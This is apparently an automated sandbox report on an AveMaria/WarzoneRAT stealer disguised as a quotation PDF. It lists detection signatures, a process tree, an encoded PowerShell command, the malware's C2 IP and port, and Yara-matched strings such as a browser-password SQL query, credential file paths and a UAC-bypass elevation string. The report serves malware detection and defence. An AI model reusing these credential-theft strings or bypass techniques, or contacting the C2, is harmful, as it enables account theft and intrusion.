Edit tour

Windows Analysis Report
order_of_quotationpdf.exe

Overview

General Information

Sample Name:	order_of_quotationpdf.exe
Analysis ID:	840855
MD5:	3a222ba5c055f7e201ae3a121fe9db9a
SHA1:	2d48a7a17e8923c26772554a74283f42b9627074
SHA256:	0707a593ad8753e14a7b1dba97a1889f039312faded9165d76920a6c25bc8388
Tags:	AveMariaRATexeRAT
Infos:

Detection

AveMaria, UACMe

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Snort IDS alert for network traffic

Malicious sample detected (through community Yara rule)

Yara detected UACMe UAC Bypass tool

Yara detected AveMaria stealer

Initial sample is a PE file and has a suspicious name

Encrypted powershell cmdline option found

Injects a PE file into a foreign processes

Hides that the sample has been downloaded from the Internet (zone.identifier)

Contains functionality to check if Internet connection is working

Increases the number of concurrent connection per server for Internet Explorer

Contains functionality to hide user accounts

Contains functionality to steal e-mail passwords

Found evasive API chain checking for user administrative privileges

Yara detected Generic Downloader

Contains functionality to steal Chrome passwords or cookies

Creates an undocumented autostart registry key

C2 URLs / IPs found in malware configuration

Contains functionality to inject threads in other processes

Found decision node followed by non-executed suspicious APIs

Contains functionality to create new users

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Stores files to the Windows start menu directory

Contains functionality to enumerate running services

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Drops PE files

Contains functionality to read the PEB

Found evasive API chain checking for process token information

Contains functionality to download and execute PE files

Contains functionality to retrieve information about pressed keystrokes

Creates a process in suspended mode (likely to inject code)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to shutdown / reboot the system

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to call native functions

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Enables debug privileges

Installs a raw input device (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Detected TCP or UDP traffic on non-standard ports

Contains functionality to download and launch executables

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

order_of_quotationpdf.exe (PID: 6752 cmdline: C:\Users\user\Desktop\order_of_quotationpdf.exe MD5: 3A222BA5C055F7E201AE3A121FE9DB9A)

powershell.exe (PID: 6804 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 7008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

order_of_quotationpdf.exe (PID: 2956 cmdline: C:\Users\user\Desktop\order_of_quotationpdf.exe MD5: 3A222BA5C055F7E201AE3A121FE9DB9A)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Ave Maria, AveMariaRAT, avemaria	Information stealer which uses AutoIT for wrapping.	Anunak	http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery https://asec.ahnlab.com/en/36629/ https://blog.morphisec.com/syk-crypter-discord https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria

Name	Description	Attribution	Blogpost URLs	Link
UACMe	A toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.	No Attribution	https://securelist.com/scarcruft-continues-to-evolve-introduces-bluetooth-harvester/90729/ https://github.com/hfiref0x/UACME	https://malpedia.caad.fkie.fraunhofer.de/details/win.uacme

Malware Configuration

Threatname: AveMaria

{"C2 url": "193.47.61.26", "port": 5200}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x1df0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x1df0:$c1: Elevation:Administrator!new:
00000003.00000002.586825371.0000000000561000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x85ea4:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x90098:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x85ea4:$c1: Elevation:Administrator!new: 0x90098:$c1: Elevation:Administrator!new:
00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x825fc:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x8c7f0:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x9f054:$a2: SMTP Password 0x9dc20:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x85ea4:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x90098:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x824ec:$a5: for /F "usebackq tokens=" %%A in (" 0x8c6e0:$a5: for /F "usebackq tokens=" %%A in (" 0x9e8e0:$a6: \Torch\User Data\Default\Login Data 0x85fc4:$a7: /n:%temp%\ellocnak.xml 0x901b8:$a7: /n:%temp%\ellocnak.xml 0x85ff4:$a9: Hey I'm Admin 0x901e8:$a9: Hey I'm Admin 0x9ee2c:$a10: \logins.json 0x9ef34:$a10: \logins.json 0x89624:$a11: Accounts\Account.rec0 0x9f818:$a11: Accounts\Account.rec0 0x822b4:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper 0x8c4a8:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth (Nextron Systems)	0x27ae0:$a1: \Opera Software\Opera Stable\Login Data 0x27de0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x275d8:$a3: \Google\Chrome\User Data\Default\Login Data
00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x29e55:$r1: Classes\Folder\shell\open\command 0x29eb9:$r1: Classes\Folder\shell\open\command 0x29f0d:$r1: Classes\Folder\shell\open\command 0x29f85:$r1: Classes\Folder\shell\open\command 0x29edc:$k1: DelegateExecute
00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x2a114:$pwsh: powershell 0x2693b:$s2: User-Agent: 0x26c7c:$s4: LdrLoadDll 0x29908:$s4: LdrLoadDll 0x264c4:$v6: start
00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x29d48:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x285ac:$a2: SMTP Password 0x27178:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x29c38:$a5: for /F "usebackq tokens=*" %%A in (" 0x27e38:$a6: \Torch\User Data\Default\Login Data 0x28384:$a10: \logins.json 0x2848c:$a10: \logins.json 0x28d70:$a11: Accounts\Account.rec0 0x29a00:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000003.00000002.586825371.0000000000400000.00000040.00000400.00020000.00000000.sdmp	AveMaria_WarZone	unknown	unknown	0x29d48:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x299e4:$str2: MsgBox.exe 0x29e24:$str4: \System32\cmd.exe 0x29a00:$str6: Ave_Maria 0x28f98:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x285ac:$str8: SMTP Password 0x275d8:$str11: \Google\Chrome\User Data\Default\Login Data 0x28f44:$str12: \sqlmap.dll 0x28f5c:$str12: \sqlmap.dll
00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2c28:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x5a30:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2c28:$c1: Elevation:Administrator!new: 0x5a30:$c1: Elevation:Administrator!new:
00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000003.00000003.403463816.0000000000715000.00000004.00000020.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x16250:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x14ab4:$a2: SMTP Password 0x13680:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x2c28:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x5a30:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x16140:$a5: for /F "usebackq tokens=*" %%A in (" 0x14340:$a6: \Torch\User Data\Default\Login Data 0x2d48:$a7: /n:%temp%\ellocnak.xml 0x5b50:$a7: /n:%temp%\ellocnak.xml 0x2d78:$a9: Hey I'm Admin 0x5b80:$a9: Hey I'm Admin 0x1488c:$a10: \logins.json 0x14994:$a10: \logins.json 0x15278:$a11: Accounts\Account.rec0 0x15f08:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2c700:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2c700:$c1: Elevation:Administrator!new:
00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x28e58:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x276bc:$a2: SMTP Password 0x26288:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x2c700:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x28d48:$a5: for /F "usebackq tokens=*" %%A in (" 0x26f48:$a6: \Torch\User Data\Default\Login Data 0x2c820:$a7: /n:%temp%\ellocnak.xml 0x2c850:$a9: Hey I'm Admin 0x27494:$a10: \logins.json 0x2759c:$a10: \logins.json 0x27e80:$a11: Accounts\Account.rec0 0x28b10:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000000.00000002.404408183.00000000070A0000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x746e0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x746e0:$c1: Elevation:Administrator!new:
00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x70e38:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x4767c:$a2: SMTP Password 0x6f69c:$a2: SMTP Password 0x46248:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x6e268:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x746e0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x70d28:$a5: for /F "usebackq tokens=*" %%A in (" 0x46f08:$a6: \Torch\User Data\Default\Login Data 0x6ef28:$a6: \Torch\User Data\Default\Login Data 0x74800:$a7: /n:%temp%\ellocnak.xml 0x74830:$a9: Hey I'm Admin 0x47454:$a10: \logins.json 0x4755c:$a10: \logins.json 0x6f474:$a10: \logins.json 0x6f57c:$a10: \logins.json 0x47e40:$a11: Accounts\Account.rec0 0x6fe60:$a11: Accounts\Account.rec0 0x70af0:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x79238:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x79238:$c1: Elevation:Administrator!new:
00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x75978:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x741dc:$a2: SMTP Password 0x72da8:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x79238:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x75868:$a5: for /F "usebackq tokens=*" %%A in (" 0x73a68:$a6: \Torch\User Data\Default\Login Data 0x79358:$a7: /n:%temp%\ellocnak.xml 0x79388:$a9: Hey I'm Admin 0x73fb4:$a10: \logins.json 0x740bc:$a10: \logins.json 0x749a0:$a11: Accounts\Account.rec0 0x75630:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
Process Memory Space: order_of_quotationpdf.exe PID: 6752	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: order_of_quotationpdf.exe PID: 6752	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: order_of_quotationpdf.exe PID: 6752	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Process Memory Space: order_of_quotationpdf.exe PID: 2956	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
Process Memory Space: order_of_quotationpdf.exe PID: 2956	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: order_of_quotationpdf.exe PID: 2956	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
Click to see the 36 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.3.order_of_quotationpdf.exe.718718.0.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xb18:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
3.3.order_of_quotationpdf.exe.718718.0.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xb18:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xb18:$c1: Elevation:Administrator!new:
3.3.order_of_quotationpdf.exe.718718.0.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
3.2.order_of_quotationpdf.exe.562070.0.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
3.2.order_of_quotationpdf.exe.562070.0.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new:
3.2.order_of_quotationpdf.exe.562070.0.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.order_of_quotationpdf.exe.4724960.6.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.order_of_quotationpdf.exe.4724960.6.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new:
0.2.order_of_quotationpdf.exe.4724960.6.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.order_of_quotationpdf.exe.37194b8.4.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.order_of_quotationpdf.exe.37194b8.4.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new:
0.2.order_of_quotationpdf.exe.37194b8.4.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.order_of_quotationpdf.exe.4774980.9.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.order_of_quotationpdf.exe.4774980.9.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new:
0.2.order_of_quotationpdf.exe.4774980.9.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
3.2.order_of_quotationpdf.exe.400000.2.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2c1f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
3.2.order_of_quotationpdf.exe.400000.2.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2c1f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2c1f0:$c1: Elevation:Administrator!new:
3.2.order_of_quotationpdf.exe.400000.2.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth (Nextron Systems)	0x266e0:$a1: \Opera Software\Opera Stable\Login Data 0x269e0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x261d8:$a3: \Google\Chrome\User Data\Default\Login Data
3.2.order_of_quotationpdf.exe.400000.2.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
3.2.order_of_quotationpdf.exe.400000.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.order_of_quotationpdf.exe.400000.2.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
3.2.order_of_quotationpdf.exe.400000.2.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x28a55:$r1: Classes\Folder\shell\open\command 0x28ab9:$r1: Classes\Folder\shell\open\command 0x28b0d:$r1: Classes\Folder\shell\open\command 0x28b85:$r1: Classes\Folder\shell\open\command 0x28adc:$k1: DelegateExecute
3.2.order_of_quotationpdf.exe.400000.2.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x28014:$s1: RDPClip 0x28cf4:$s2: Grabber 0x28d04:$s2: Grabber 0x28600:$s3: Ave_Maria Stealer OpenSource 0x285b8:$s4: \MidgetPorn\workspace\MsgBox.exe 0x2c310:$s6: /n:%temp%\ellocnak.xml 0x2c340:$s7: Hey I'm Admin
3.2.order_of_quotationpdf.exe.400000.2.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x28d14:$pwsh: powershell 0x2553b:$s2: User-Agent: 0x2587c:$s4: LdrLoadDll 0x28508:$s4: LdrLoadDll 0x250c4:$v6: start
3.2.order_of_quotationpdf.exe.400000.2.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x28948:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x271ac:$a2: SMTP Password 0x25d78:$a3: select signon_realm, origin_url, username_value, password_value from logins 0x2c1f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x28838:$a5: for /F "usebackq tokens=*" %%A in (" 0x26a38:$a6: \Torch\User Data\Default\Login Data 0x2c310:$a7: /n:%temp%\ellocnak.xml 0x2c340:$a9: Hey I'm Admin 0x26f84:$a10: \logins.json 0x2708c:$a10: \logins.json 0x27970:$a11: Accounts\Account.rec0 0x28600:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
3.2.order_of_quotationpdf.exe.400000.2.unpack	AveMaria_WarZone	unknown	unknown	0x28948:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x285e4:$str2: MsgBox.exe 0x28a24:$str4: \System32\cmd.exe 0x28600:$str6: Ave_Maria 0x27b98:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x271ac:$str8: SMTP Password 0x261d8:$str11: \Google\Chrome\User Data\Default\Login Data 0x27b44:$str12: \sqlmap.dll 0x27b5c:$str12: \sqlmap.dll 0x2c1f0:$str16: Elevation:Administrator!new 0x2c310:$str17: /n:%temp%
0.2.order_of_quotationpdf.exe.46f94f0.5.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2a9f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
0.2.order_of_quotationpdf.exe.46f94f0.5.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0x2a9f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x2a9f0:$c1: Elevation:Administrator!new:
0.2.order_of_quotationpdf.exe.46f94f0.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth (Nextron Systems)	0x252e0:$a1: \Opera Software\Opera Stable\Login Data 0x255e0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x24dd8:$a3: \Google\Chrome\User Data\Default\Login Data
0.2.order_of_quotationpdf.exe.46f94f0.5.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
0.2.order_of_quotationpdf.exe.46f94f0.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.order_of_quotationpdf.exe.46f94f0.5.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
0.2.order_of_quotationpdf.exe.46f94f0.5.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x27655:$r1: Classes\Folder\shell\open\command 0x276b9:$r1: Classes\Folder\shell\open\command 0x2770d:$r1: Classes\Folder\shell\open\command 0x27785:$r1: Classes\Folder\shell\open\command 0x276dc:$k1: DelegateExecute
0.2.order_of_quotationpdf.exe.46f94f0.5.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x26c14:$s1: RDPClip 0x278f4:$s2: Grabber 0x27904:$s2: Grabber 0x27200:$s3: Ave_Maria Stealer OpenSource 0x271b8:$s4: \MidgetPorn\workspace\MsgBox.exe 0x2ab10:$s6: /n:%temp%\ellocnak.xml 0x2ab40:$s7: Hey I'm Admin
0.2.order_of_quotationpdf.exe.46f94f0.5.unpack	MALWARE_Win_EXEPWSH_DLAgent	Detects SystemBC	ditekSHen	0x27914:$pwsh: powershell 0x2493b:$s2: User-Agent: 0x27108:$s4: LdrLoadDll 0x244c4:$v6: start
0.2.order_of_quotationpdf.exe.46f94f0.5.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x27548:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x25dac:$a2: SMTP Password 0x2a9f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x27438:$a5: for /F "usebackq tokens=*" %%A in (" 0x25638:$a6: \Torch\User Data\Default\Login Data 0x2ab10:$a7: /n:%temp%\ellocnak.xml 0x2ab40:$a9: Hey I'm Admin 0x25b84:$a10: \logins.json 0x25c8c:$a10: \logins.json 0x26570:$a11: Accounts\Account.rec0 0x27200:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
0.2.order_of_quotationpdf.exe.46f94f0.5.unpack	AveMaria_WarZone	unknown	unknown	0x27548:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x271e4:$str2: MsgBox.exe 0x27624:$str4: \System32\cmd.exe 0x27200:$str6: Ave_Maria 0x26798:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x25dac:$str8: SMTP Password 0x24dd8:$str11: \Google\Chrome\User Data\Default\Login Data 0x26744:$str12: \sqlmap.dll 0x2675c:$str12: \sqlmap.dll 0x2a9f0:$str16: Elevation:Administrator!new 0x2ab10:$str17: /n:%temp%
3.3.order_of_quotationpdf.exe.715910.2.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xb18:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
3.3.order_of_quotationpdf.exe.715910.2.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth (Nextron Systems)	0xb18:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xb18:$c1: Elevation:Administrator!new:
3.3.order_of_quotationpdf.exe.715910.2.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
